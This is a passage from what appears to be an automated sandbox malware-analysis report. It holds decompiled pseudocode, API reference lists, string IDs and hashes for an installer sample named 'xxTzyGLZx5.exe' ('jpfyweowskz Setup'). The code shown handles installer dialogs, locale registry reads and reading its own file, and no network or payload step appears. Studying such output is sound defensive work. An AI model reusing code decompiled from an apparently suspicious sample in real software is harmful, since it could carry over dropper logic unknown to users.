                                                                                                							__eflags =  *0x42e32c - _t133; // 0x0
                                                                                                							if(__eflags != 0) {
                                                                                                								break;
                                                                                                							}
                                                                                                							_t44 =  *0x42eb84; // 0x2
                                                                                                							__eflags =  *0x40919c - _t44; // 0xffffffff
                                                                                                							if(__eflags >= 0) {
                                                                                                								break;
                                                                                                							}
                                                                                                							_t116 =  *(_t130 + 0x14);
                                                                                                							E0040594D(_t116, _t125, _t130, 0x436800,  *((intOrPtr*)(_t130 + 0x24)));
                                                                                                							_push( *((intOrPtr*)(_t130 + 0x20)));
                                                                                                							_push(0xfffffc19);
                                                                                                							E00403CDD(_t125);
                                                                                                							_push( *((intOrPtr*)(_t130 + 0x1c)));
                                                                                                							_push(0xfffffc1b);
                                                                                                							E00403CDD(_t125);
                                                                                                							_push( *((intOrPtr*)(_t130 + 0x28)));
                                                                                                							_push(0xfffffc1a);
                                                                                                							E00403CDD(_t125);
                                                                                                							_t49 = GetDlgItem(_t125, 3);
                                                                                                							__eflags =  *0x42ebec - _t133; // 0x0
                                                                                                							_v32 = _t49;
                                                                                                							if(__eflags != 0) {
                                                                                                								_t116 = _t116 & 0x0000fefd | 0x00000004;
                                                                                                								__eflags = _t116;
                                                                                                							}
                                                                                                							ShowWindow(_t49, _t116 & 0x00000008);
                                                                                                							EnableWindow( *(_t134 + 0x30), _t116 & 0x00000100);
                                                                                                							E00403CFF(_t116 & 0x00000002);
                                                                                                							_t117 = _t116 & 0x00000004;
                                                                                                							EnableWindow( *0x428f98, _t117);
                                                                                                							__eflags = _t117 - _t133;
                                                                                                							if(_t117 == _t133) {
                                                                                                								_push(1);
                                                                                                							} else {
                                                                                                								_push(_t133);
                                                                                                							}
                                                                                                							EnableMenuItem(GetSystemMenu(_t125, _t133), 0xf060, ??);
                                                                                                							SendMessageA( *(_t134 + 0x38), 0xf4, _t133, 1);
                                                                                                							__eflags =  *0x42ebec - _t133; // 0x0
                                                                                                							if(__eflags == 0) {
                                                                                                								_push( *0x429fd0);
                                                                                                							} else {
                                                                                                								SendMessageA(_t125, 0x401, 2, _t133);
                                                                                                								_push( *0x428f98);
                                                                                                							}
                                                                                                							E00403D12();
                                                                                                							E0040592B(0x429fd8, "jpfyweowskz Setup");
                                                                                                							E0040594D(0x429fd8, _t125, _t130,  &(0x429fd8[lstrlenA(0x429fd8)]),  *((intOrPtr*)(_t130 + 0x18)));
                                                                                                							SetWindowTextA(_t125, 0x429fd8);
                                                                                                							_push(_t133);
                                                                                                							_t67 = E00401389( *((intOrPtr*)(_t130 + 8)));
                                                                                                							__eflags = _t67;
                                                                                                							if(_t67 != 0) {
                                                                                                								continue;
                                                                                                							} else {
                                                                                                								__eflags =  *_t130 - _t133;
                                                                                                								if( *_t130 == _t133) {
                                                                                                									continue;
                                                                                                								}
                                                                                                								__eflags =  *(_t130 + 4) - 5;
                                                                                                								if( *(_t130 + 4) != 5) {
                                                                                                									DestroyWindow( *0x42e338);
                                                                                                									 *0x4297a8 = _t130;
                                                                                                									__eflags =  *_t130 - _t133;
                                                                                                									if( *_t130 <= _t133) {
                                                                                                										goto L58;
                                                                                                									}
                                                                                                									_t73 = CreateDialogParamA( *0x42eb60,  *_t130 +  *0x42e340 & 0x0000ffff, _t125,  *(0x4091a0 +  *(_t130 + 4) * 4), _t130);
                                                                                                									__eflags = _t73 - _t133;
                                                                                                									 *0x42e338 = _t73;
                                                                                                									if(_t73 == _t133) {
                                                                                                										goto L58;
                                                                                                									}
                                                                                                									_push( *((intOrPtr*)(_t130 + 0x2c)));
                                                                                                									_push(6);
                                                                                                									E00403CDD(_t73);
                                                                                                									GetWindowRect(GetDlgItem(_t125, 0x3fa), _t134 + 0x10);
                                                                                                									ScreenToClient(_t125, _t134 + 0x10);
                                                                                                									SetWindowPos( *0x42e338, _t133,  *(_t134 + 0x20),  *(_t134 + 0x20), _t133, _t133, 0x15);
                                                                                                									_push(_t133);
                                                                                                									E00401389( *((intOrPtr*)(_t130 + 0xc)));
                                                                                                									__eflags =  *0x42e32c - _t133; // 0x0
                                                                                                									if(__eflags != 0) {
                                                                                                										goto L61;
                                                                                                									}
                                                                                                									ShowWindow( *0x42e338, 8);
                                                                                                									E00403D29(0x405);
                                                                                                									goto L58;
                                                                                                								}
                                                                                                								__eflags =  *0x42ebec - _t133; // 0x0
                                                                                                								if(__eflags != 0) {
                                                                                                									goto L61;
                                                                                                								}
                                                                                                								__eflags =  *0x42ebe0 - _t133; // 0x0
                                                                                                								if(__eflags != 0) {
                                                                                                									continue;
                                                                                                								}
                                                                                                								goto L61;
                                                                                                							}
                                                                                                						}
                                                                                                						DestroyWindow( *0x42e338);
                                                                                                						 *0x42eb68 = _t133;
                                                                                                						EndDialog(_t125,  *0x4293a0);
                                                                                                						goto L58;
                                                                                                					} else {
                                                                                                						__eflags = _t35 - 1;
                                                                                                						if(_t35 != 1) {
                                                                                                							L33:
                                                                                                							__eflags =  *_t130 - _t133;
                                                                                                							if( *_t130 == _t133) {
                                                                                                								goto L61;
                                                                                                							}
                                                                                                							goto L34;
                                                                                                						}
                                                                                                						_push(0);
                                                                                                						_t86 = E00401389( *((intOrPtr*)(_t130 + 0x10)));
                                                                                                						__eflags = _t86;
                                                                                                						if(_t86 == 0) {
                                                                                                							goto L33;
                                                                                                						}
                                                                                                						SendMessageA( *0x42e338, 0x40f, 0, 1);
                                                                                                						__eflags =  *0x42e32c - _t133; // 0x0
                                                                                                						return 0 | __eflags == 0x00000000;
                                                                                                					}
                                                                                                				} else {
                                                                                                					_t125 = _a4;
                                                                                                					_t133 = 0;
                                                                                                					if(_t115 == 0x47) {
                                                                                                						SetWindowPos( *0x429fb0, _t125, 0, 0, 0, 0, 0x13);
                                                                                                					}
                                                                                                					if(_t115 == 5) {
                                                                                                						asm("sbb eax, eax");
                                                                                                						ShowWindow( *0x429fb0,  ~(_a12 - 1) & _t115);
                                                                                                					}
                                                                                                					if(_t115 != 0x40d) {
                                                                                                						__eflags = _t115 - 0x11;
                                                                                                						if(_t115 != 0x11) {
                                                                                                							__eflags = _t115 - 0x111;
                                                                                                							if(_t115 != 0x111) {
                                                                                                								L26:
                                                                                                								return E00403D44(_t115, _a12, _a16);
                                                                                                							}
                                                                                                							_t132 = _a12 & 0x0000ffff;
                                                                                                							_t126 = GetDlgItem(_t125, _t132);
                                                                                                							__eflags = _t126 - _t133;
                                                                                                							if(_t126 == _t133) {
                                                                                                								L13:
                                                                                                								__eflags = _t132 - 1;
                                                                                                								if(_t132 != 1) {
                                                                                                									__eflags = _t132 - 3;
                                                                                                									if(_t132 != 3) {
                                                                                                										_t127 = 2;
                                                                                                										__eflags = _t132 - _t127;
                                                                                                										if(_t132 != _t127) {
                                                                                                											L25:
                                                                                                											SendMessageA( *0x42e338, 0x111, _a12, _a16);
                                                                                                											goto L26;
                                                                                                										}
                                                                                                										__eflags =  *0x42ebec - _t133; // 0x0
                                                                                                										if(__eflags == 0) {
                                                                                                											_t99 = E0040140B(3);
                                                                                                											__eflags = _t99;
                                                                                                											if(_t99 != 0) {
                                                                                                												goto L26;
                                                                                                											}
                                                                                                											 *0x4293a0 = 1;
                                                                                                											L21:
                                                                                                											_push(0x78);
                                                                                                											L22:
                                                                                                											E00403CB6();
                                                                                                											goto L26;
                                                                                                										}
                                                                                                										E0040140B(_t127);
                                                                                                										 *0x4293a0 = _t127;
                                                                                                										goto L21;
                                                                                                									}
                                                                                                									__eflags =  *0x40919c - _t133; // 0xffffffff
                                                                                                									if(__eflags <= 0) {
                                                                                                										goto L25;
                                                                                                									}
                                                                                                									_push(0xffffffff);
                                                                                                									goto L22;
                                                                                                								}
                                                                                                								_push(_t132);
                                                                                                								goto L22;
                                                                                                							}
                                                                                                							SendMessageA(_t126, 0xf3, _t133, _t133);
                                                                                                							_t103 = IsWindowEnabled(_t126);
                                                                                                							__eflags = _t103;
                                                                                                							if(_t103 == 0) {
                                                                                                								goto L61;
                                                                                                							}
                                                                                                							goto L13;
                                                                                                						}
                                                                                                						SetWindowLongA(_t125, _t133, _t133);
                                                                                                						return 1;
                                                                                                					} else {
                                                                                                						DestroyWindow( *0x42e338);
                                                                                                						 *0x42e338 = _a12;
                                                                                                						L58:
                                                                                                						if( *0x42afd8 == _t133) {
                                                                                                							_t142 =  *0x42e338 - _t133; // 0x0
                                                                                                							if(_t142 != 0) {
                                                                                                								ShowWindow(_t125, 0xa);
                                                                                                								 *0x42afd8 = 1;
                                                                                                							}
                                                                                                						}
                                                                                                						L61:
                                                                                                						return 0;
                                                                                                					}
                                                                                                				}
                                                                                                			}
































                                                                                                0x00403a6e
                                                                                                0x00403a74
                                                                                                0x00403a79
                                                                                                0x00403a7c
                                                                                                0x00403a82
                                                                                                0x00403a87
                                                                                                0x00403a8a
                                                                                                0x00403a90
                                                                                                0x00403a98
                                                                                                0x00403a9e
                                                                                                0x00403aa4
                                                                                                0x00403aa8
                                                                                                0x00403aaf
                                                                                                0x00403aaf
                                                                                                0x00403aaf
                                                                                                0x00403ab9
                                                                                                0x00403acb
                                                                                                0x00403ad7
                                                                                                0x00403adc
                                                                                                0x00403ae6
                                                                                                0x00403aec
                                                                                                0x00403aee
                                                                                                0x00403af3
                                                                                                0x00403af0
                                                                                                0x00403af0
                                                                                                0x00403af0
                                                                                                0x00403b03
                                                                                                0x00403b1b
                                                                                                0x00403b1d
                                                                                                0x00403b23
                                                                                                0x00403b38
                                                                                                0x00403b25
                                                                                                0x00403b2e
                                                                                                0x00403b30
                                                                                                0x00403b30
                                                                                                0x00403b3e
                                                                                                0x00403b4e
                                                                                                0x00403b5f
                                                                                                0x00403b66
                                                                                                0x00403b6c
                                                                                                0x00403b70
                                                                                                0x00403b75
                                                                                                0x00403b77
                                                                                                0x00000000
                                                                                                0x00403b7d
                                                                                                0x00403b7d
                                                                                                0x00403b7f
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00403b85
                                                                                                0x00403b89
                                                                                                0x00403bae
                                                                                                0x00403bb4
                                                                                                0x00403bba
                                                                                                0x00403bbc
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00403be2
                                                                                                0x00403be8
                                                                                                0x00403bea
                                                                                                0x00403bef
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00403bf5
                                                                                                0x00403bf8
                                                                                                0x00403bfb
                                                                                                0x00403c12
                                                                                                0x00403c1e
                                                                                                0x00403c37
                                                                                                0x00403c3d
                                                                                                0x00403c41
                                                                                                0x00403c46
                                                                                                0x00403c4c
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00403c56
                                                                                                0x00403c61
                                                                                                0x00000000
                                                                                                0x00403c61
                                                                                                0x00403b8b
                                                                                                0x00403b91
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00403b97
                                                                                                0x00403b9d
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00403ba3
                                                                                                0x00403b77
                                                                                                0x00403c6e
                                                                                                0x00403c7a
                                                                                                0x00403c81
                                                                                                0x00000000
                                                                                                0x004039d2
                                                                                                0x004039d2
                                                                                                0x004039d5
                                                                                                0x00403a08
                                                                                                0x00403a08
                                                                                                0x00403a0a
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00403a0a
                                                                                                0x004039d7
                                                                                                0x004039db
                                                                                                0x004039e0
                                                                                                0x004039e2
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004039f2
                                                                                                0x004039fa
                                                                                                0x00000000
                                                                                                0x00403a00
                                                                                                0x0040382e
                                                                                                0x0040382e
                                                                                                0x00403832
                                                                                                0x00403837
                                                                                                0x00403846
                                                                                                0x00403846
                                                                                                0x0040384f
                                                                                                0x00403858
                                                                                                0x00403863
                                                                                                0x00403863
                                                                                                0x0040386f
                                                                                                0x0040388b
                                                                                                0x0040388e
                                                                                                0x004038a1
                                                                                                0x004038a7
                                                                                                0x0040394a
                                                                                                0x00000000
                                                                                                0x00403953
                                                                                                0x004038ad
                                                                                                0x004038ba
                                                                                                0x004038bc
                                                                                                0x004038be
                                                                                                0x004038dd
                                                                                                0x004038dd
                                                                                                0x004038e0
                                                                                                0x004038e5
                                                                                                0x004038e8
                                                                                                0x004038f8
                                                                                                0x004038f9
                                                                                                0x004038fb
                                                                                                0x00403931
                                                                                                0x00403944
                                                                                                0x00000000
                                                                                                0x00403944
                                                                                                0x004038fd
                                                                                                0x00403903
                                                                                                0x0040391c
                                                                                                0x00403921
                                                                                                0x00403923
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00403925
                                                                                                0x00403911
                                                                                                0x00403911
                                                                                                0x00403913
                                                                                                0x00403913
                                                                                                0x00000000
                                                                                                0x00403913
                                                                                                0x00403906
                                                                                                0x0040390b
                                                                                                0x00000000
                                                                                                0x0040390b
                                                                                                0x004038ea
                                                                                                0x004038f0
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004038f2
                                                                                                0x00000000
                                                                                                0x004038f2
                                                                                                0x004038e2
                                                                                                0x00000000
                                                                                                0x004038e2
                                                                                                0x004038c8
                                                                                                0x004038cf
                                                                                                0x004038d5
                                                                                                0x004038d7
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004038d7
                                                                                                0x00403893
                                                                                                0x00000000
                                                                                                0x00403871
                                                                                                0x00403877
                                                                                                0x00403881
                                                                                                0x00403c87
                                                                                                0x00403c8d
                                                                                                0x00403c8f
                                                                                                0x00403c95
                                                                                                0x00403c9a
                                                                                                0x00403ca0
                                                                                                0x00403ca0
                                                                                                0x00403c95
                                                                                                0x00403caa
                                                                                                0x00000000
                                                                                                0x00403caa
                                                                                                0x0040386f

                                                                                                APIs
                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403846
                                                                                                • ShowWindow.USER32(?), ref: 00403863
                                                                                                • DestroyWindow.USER32 ref: 00403877
                                                                                                • SetWindowLongA.USER32 ref: 00403893
                                                                                                • GetDlgItem.USER32 ref: 004038B4
                                                                                                • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 004038C8
                                                                                                • IsWindowEnabled.USER32(00000000), ref: 004038CF
                                                                                                • GetDlgItem.USER32 ref: 0040397D
                                                                                                • GetDlgItem.USER32 ref: 00403987
                                                                                                • KiUserCallbackDispatcher.NTDLL(?,000000F2,?,0000001C,000000FF), ref: 004039A1
                                                                                                • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 004039F2
                                                                                                • GetDlgItem.USER32 ref: 00403A98
                                                                                                • ShowWindow.USER32(00000000,?), ref: 00403AB9
                                                                                                • EnableWindow.USER32(?,?), ref: 00403ACB
                                                                                                • EnableWindow.USER32(?,?), ref: 00403AE6
                                                                                                • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403AFC
                                                                                                • EnableMenuItem.USER32 ref: 00403B03
                                                                                                • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403B1B
                                                                                                • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403B2E
                                                                                                • lstrlenA.KERNEL32(00429FD8,?,00429FD8,jpfyweowskz Setup), ref: 00403B57
                                                                                                • SetWindowTextA.USER32(?,00429FD8), ref: 00403B66
                                                                                                • ShowWindow.USER32(?,0000000A), ref: 00403C9A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.675084416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000001.00000002.675078765.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675094435.0000000000407000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675103409.0000000000409000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675141346.000000000042C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675150844.0000000000434000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675162007.0000000000437000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: Window$Item$MessageSend$EnableShow$Menu$CallbackDestroyDispatcherEnabledLongSystemTextUserlstrlen
                                                                                                • String ID: jpfyweowskz Setup
                                                                                                • API String ID: 4050669955-4204252603
                                                                                                • Opcode ID: 43eaee0801e6aaf426ce723482984d0a7cd0caf67a9dfded40985b489c984417
                                                                                                • Instruction ID: 5403acdcc1aa6bbc142bc1e7719ab292303190a86846970e4bd25be8090c7a94
                                                                                                • Opcode Fuzzy Hash: 43eaee0801e6aaf426ce723482984d0a7cd0caf67a9dfded40985b489c984417
                                                                                                • Instruction Fuzzy Hash: DCC1B471A08204ABEB21AF62ED85E2B7E6CFB45706F40043EF541B51E1C779A942DF1E
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 96%
                                                                                                			E00403489() {
                                                                                                				intOrPtr _v4;
                                                                                                				intOrPtr _v8;
                                                                                                				int _v12;
                                                                                                				int _v16;
                                                                                                				char _v20;
                                                                                                				void* __ebx;
                                                                                                				void* __edi;
                                                                                                				void* __esi;
                                                                                                				intOrPtr* _t20;
                                                                                                				signed int _t24;
                                                                                                				void* _t28;
                                                                                                				void* _t30;
                                                                                                				int _t31;
                                                                                                				void* _t34;
                                                                                                				struct HINSTANCE__* _t37;
                                                                                                				int _t38;
                                                                                                				intOrPtr _t39;
                                                                                                				int _t42;
                                                                                                				intOrPtr _t59;
                                                                                                				char _t61;
                                                                                                				CHAR* _t63;
                                                                                                				signed char _t67;
                                                                                                				struct HINSTANCE__* _t75;
                                                                                                				CHAR* _t78;
                                                                                                				intOrPtr _t80;
                                                                                                				CHAR* _t85;
                                                                                                
                                                                                                				_t80 =  *0x42eb70; // 0x5ff628
                                                                                                				_t20 = E00405C49(6);
                                                                                                				_t87 = _t20;
                                                                                                				if(_t20 == 0) {
                                                                                                					_t78 = 0x429fd8;
                                                                                                					"1033" = 0x7830;
                                                                                                					E00405812(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x429fd8, 0);
                                                                                                					__eflags =  *0x429fd8;
                                                                                                					if(__eflags == 0) {
                                                                                                						E00405812(0x80000003, ".DEFAULT\\Control Panel\\International",  &M00407302, 0x429fd8, 0);
                                                                                                					}
                                                                                                					lstrcatA("1033", _t78);
                                                                                                				} else {
                                                                                                					E00405889("1033",  *_t20() & 0x0000ffff);
                                                                                                				}
                                                                                                				E0040373D(_t75, _t87);
                                                                                                				_t24 =  *0x42eb78; // 0x80
                                                                                                				_t84 = "C:\\Users\\jones\\AppData\\Local\\Temp";
                                                                                                				 *0x42ebe0 = _t24 & 0x00000020;
                                                                                                				if(E004054FF(_t87, "C:\\Users\\jones\\AppData\\Local\\Temp") != 0) {
                                                                                                					L16:
                                                                                                					if(E004054FF(_t95, _t84) == 0) {
                                                                                                						E0040594D(0, _t78, _t80, _t84,  *((intOrPtr*)(_t80 + 0x118)));
                                                                                                					}
                                                                                                					_t28 = LoadImageA( *0x42eb60, 0x67, 1, 0, 0, 0x8040); // executed
                                                                                                					 *0x42e348 = _t28;
                                                                                                					if( *((intOrPtr*)(_t80 + 0x50)) == 0xffffffff) {
                                                                                                						L21:
                                                                                                						if(E0040140B(0) == 0) {
                                                                                                							_t30 = E0040373D(_t75, __eflags);
                                                                                                							__eflags =  *0x42ec00; // 0x0
                                                                                                							if(__eflags != 0) {
                                                                                                								_t31 = E00404D9B(_t30, 0);
                                                                                                								__eflags = _t31;
                                                                                                								if(_t31 == 0) {
                                                                                                									E0040140B(1);
                                                                                                									goto L33;
                                                                                                								}
                                                                                                								__eflags =  *0x42e32c; // 0x0
                                                                                                								if(__eflags == 0) {
                                                                                                									E0040140B(2);
                                                                                                								}
                                                                                                								goto L22;
                                                                                                							}
                                                                                                							ShowWindow( *0x429fb0, 5); // executed
                                                                                                							_t37 = LoadLibraryA("RichEd20"); // executed
                                                                                                							__eflags = _t37;
                                                                                                							if(_t37 == 0) {
                                                                                                								LoadLibraryA("RichEd32");
                                                                                                							}
                                                                                                							_t85 = "RichEdit20A";
                                                                                                							_t38 = GetClassInfoA(0, _t85, 0x42e300);
                                                                                                							__eflags = _t38;
                                                                                                							if(_t38 == 0) {
                                                                                                								GetClassInfoA(0, "RichEdit", 0x42e300);
                                                                                                								 *0x42e324 = _t85;
                                                                                                								RegisterClassA(0x42e300);
                                                                                                							}
                                                                                                							_t39 =  *0x42e340; // 0x0
                                                                                                							_t42 = DialogBoxParamA( *0x42eb60, _t39 + 0x00000069 & 0x0000ffff, 0, E0040380A, 0); // executed
                                                                                                							E0040140B(5);
                                                                                                							return _t42;
                                                                                                						}
                                                                                                						L22:
                                                                                                						_t34 = 2;
                                                                                                						return _t34;
                                                                                                					} else {
                                                                                                						_t75 =  *0x42eb60; // 0x400000
                                                                                                						 *0x42e314 = _t28;
                                                                                                						_v20 = 0x624e5f;
                                                                                                						 *0x42e304 = E00401000;
                                                                                                						 *0x42e310 = _t75;
                                                                                                						 *0x42e324 =  &_v20;
                                                                                                						if(RegisterClassA(0x42e300) == 0) {
                                                                                                							L33:
                                                                                                							__eflags = 0;
                                                                                                							return 0;
                                                                                                						}
                                                                                                						_t12 =  &_v16; // 0x624e5f
                                                                                                						SystemParametersInfoA(0x30, 0, _t12, 0);
                                                                                                						 *0x429fb0 = CreateWindowExA(0x80,  &_v20, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42eb60, 0);
                                                                                                						goto L21;
                                                                                                					}
                                                                                                				} else {
                                                                                                					_t75 =  *(_t80 + 0x48);
                                                                                                					if(_t75 == 0) {
                                                                                                						goto L16;
                                                                                                					}
                                                                                                					_t59 =  *0x42eb98; // 0x603dec
                                                                                                					_t78 = 0x42db00;
                                                                                                					E00405812( *((intOrPtr*)(_t80 + 0x44)), _t75,  *((intOrPtr*)(_t80 + 0x4c)) + _t59, 0x42db00, 0);
                                                                                                					_t61 =  *0x42db00; // 0x63
                                                                                                					if(_t61 == 0) {
                                                                                                						goto L16;
                                                                                                					}
                                                                                                					if(_t61 == 0x22) {
                                                                                                						_t78 = 0x42db01;
                                                                                                						 *((char*)(E00405449(0x42db01, 0x22))) = 0;
                                                                                                					}
                                                                                                					_t63 = lstrlenA(_t78) + _t78 - 4;
                                                                                                					if(_t63 <= _t78 || lstrcmpiA(_t63, ?str?) != 0) {
                                                                                                						L15:
                                                                                                						E0040592B(_t84, E0040541E(_t78));
                                                                                                						goto L16;
                                                                                                					} else {
                                                                                                						_t67 = GetFileAttributesA(_t78);
                                                                                                						if(_t67 == 0xffffffff) {
                                                                                                							L14:
                                                                                                							E00405465(_t78);
                                                                                                							goto L15;
                                                                                                						}
                                                                                                						_t95 = _t67 & 0x00000010;
                                                                                                						if((_t67 & 0x00000010) != 0) {
                                                                                                							goto L15;
                                                                                                						}
                                                                                                						goto L14;
                                                                                                					}
                                                                                                				}
                                                                                                			}






























                                                                                                APIs
                                                                                                  • Part of subcall function 00405C49: GetModuleHandleA.KERNEL32(?,?,00000000,00403126,00000008), ref: 00405C5B
                                                                                                  • Part of subcall function 00405C49: LoadLibraryA.KERNELBASE(?,?,00000000,00403126,00000008), ref: 00405C66
                                                                                                  • Part of subcall function 00405C49: GetProcAddress.KERNEL32(00000000,?), ref: 00405C77
                                                                                                • lstrcatA.KERNEL32(1033,00429FD8,80000001,Control Panel\Desktop\ResourceLocale,00000000,00429FD8,00000000,00000006,"C:\Users\user\Desktop\xxTzyGLZx5.exe" ,00000000,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004034FA
                                                                                                • lstrlenA.KERNEL32(cegrwbhzuj,?,?,?,cegrwbhzuj,00000000,C:\Users\user\AppData\Local\Temp,1033,00429FD8,80000001,Control Panel\Desktop\ResourceLocale,00000000,00429FD8,00000000,00000006,"C:\Users\user\Desktop\xxTzyGLZx5.exe" ), ref: 00403565
                                                                                                • lstrcmpiA.KERNEL32(?,.exe,cegrwbhzuj,?,?,?,cegrwbhzuj,00000000,C:\Users\user\AppData\Local\Temp,1033,00429FD8,80000001,Control Panel\Desktop\ResourceLocale,00000000,00429FD8,00000000), ref: 00403578
                                                                                                • GetFileAttributesA.KERNEL32(cegrwbhzuj), ref: 00403583
                                                                                                • LoadImageA.USER32 ref: 004035CC
                                                                                                  • Part of subcall function 00405889: wsprintfA.USER32 ref: 00405896
                                                                                                • RegisterClassA.USER32 ref: 00403613
                                                                                                • SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 0040362B
                                                                                                • CreateWindowExA.USER32 ref: 00403664
                                                                                                • ShowWindow.USER32(00000005,00000000), ref: 00403696
                                                                                                • LoadLibraryA.KERNELBASE(RichEd20), ref: 004036A7
                                                                                                • LoadLibraryA.KERNEL32(RichEd32), ref: 004036B2
                                                                                                • GetClassInfoA.USER32 ref: 004036C2
                                                                                                • GetClassInfoA.USER32 ref: 004036CF
                                                                                                • RegisterClassA.USER32 ref: 004036D8
                                                                                                • DialogBoxParamA.USER32 ref: 004036F7
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.675084416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000001.00000002.675078765.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675094435.0000000000407000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675103409.0000000000409000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675141346.000000000042C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675150844.0000000000434000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675162007.0000000000437000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                • String ID: "C:\Users\user\Desktop\xxTzyGLZx5.exe" $.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$cegrwbhzuj$=`
                                                                                                • API String ID: 914957316-2214854557
                                                                                                • Opcode ID: ddebcaf873b3f80ffc25d6dfb232b9e28d9230a7995e8b1577ae424d02e99e0f
                                                                                                • Instruction ID: 2e12796d13047950d683a8fbe5a4005f9ba98cb8c12c36bead37cfa09a1e5f4f
                                                                                                • Opcode Fuzzy Hash: ddebcaf873b3f80ffc25d6dfb232b9e28d9230a7995e8b1577ae424d02e99e0f
                                                                                                • Instruction Fuzzy Hash: 4C61C5B0644244BED620AF629D45E273AACEB4575AF44443FF941B22E2D73DAD018A3E
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 80%
                                                                                                			E00402C0B(void* __eflags, signed int _a4) {
                                                                                                				DWORD* _v8;
                                                                                                				DWORD* _v12;
                                                                                                				void* _v16;
                                                                                                				intOrPtr _v20;
                                                                                                				long _v24;
                                                                                                				intOrPtr _v28;
                                                                                                				intOrPtr _v32;
                                                                                                				intOrPtr _v36;
                                                                                                				intOrPtr _v40;
                                                                                                				signed int _v44;
                                                                                                				long _t43;
                                                                                                				signed int _t50;
                                                                                                				void* _t53;
                                                                                                				signed int _t54;
                                                                                                				void* _t57;
                                                                                                				intOrPtr* _t59;
                                                                                                				long _t60;
                                                                                                				signed int _t65;
                                                                                                				signed int _t67;
                                                                                                				signed int _t70;
                                                                                                				signed int _t71;
                                                                                                				signed int _t77;
                                                                                                				intOrPtr _t80;
                                                                                                				long _t82;
                                                                                                				signed int _t85;
                                                                                                				signed int _t87;
                                                                                                				void* _t89;
                                                                                                				signed int _t90;
                                                                                                				signed int _t93;
                                                                                                				void* _t94;
                                                                                                
                                                                                                				_t82 = 0;
                                                                                                				_v12 = 0;
                                                                                                				_v8 = 0;
                                                                                                				_t43 = GetTickCount();
                                                                                                				_t91 = "C:\\Users\\jones\\Desktop\\xxTzyGLZx5.exe";
                                                                                                				 *0x42eb6c = _t43 + 0x3e8;
                                                                                                				GetModuleFileNameA(0, "C:\\Users\\jones\\Desktop\\xxTzyGLZx5.exe", 0x400);
                                                                                                				_t89 = E00405602(_t91, 0x80000000, 3);
                                                                                                				_v16 = _t89;
                                                                                                				 *0x409010 = _t89;
                                                                                                				if(_t89 == 0xffffffff) {
                                                                                                					return "Error launching installer";
                                                                                                				}
                                                                                                				_t92 = "C:\\Users\\jones\\Desktop";
                                                                                                				E0040592B("C:\\Users\\jones\\Desktop", _t91);
                                                                                                				E0040592B(0x436000, E00405465(_t92));
                                                                                                				_t50 = GetFileSize(_t89, 0);
                                                                                                				__eflags = _t50;
                                                                                                				 *0x428b88 = _t50;
                                                                                                				_t93 = _t50;
                                                                                                				if(_t50 <= 0) {
                                                                                                					L24:
                                                                                                					E00402BB0(1);
                                                                                                					__eflags =  *0x42eb74 - _t82; // 0x33000
                                                                                                					if(__eflags == 0) {
                                                                                                						goto L29;
                                                                                                					}
                                                                                                					__eflags = _v8 - _t82;
                                                                                                					if(_v8 == _t82) {
                                                                                                						L28:
                                                                                                						_t53 = GlobalAlloc(0x40, _v24); // executed
                                                                                                						_t94 = _t53;
                                                                                                						_t54 =  *0x42eb74; // 0x33000
                                                                                                						E00403098(_t54 + 0x1c);
                                                                                                						_push(_v24);
                                                                                                						_push(_t94);
                                                                                                						_push(_t82);
                                                                                                						_push(0xffffffff);
                                                                                                						_t57 = E00402E44();
                                                                                                						__eflags = _t57 - _v24;
                                                                                                						if(_t57 == _v24) {
                                                                                                							__eflags = _v44 & 0x00000001;
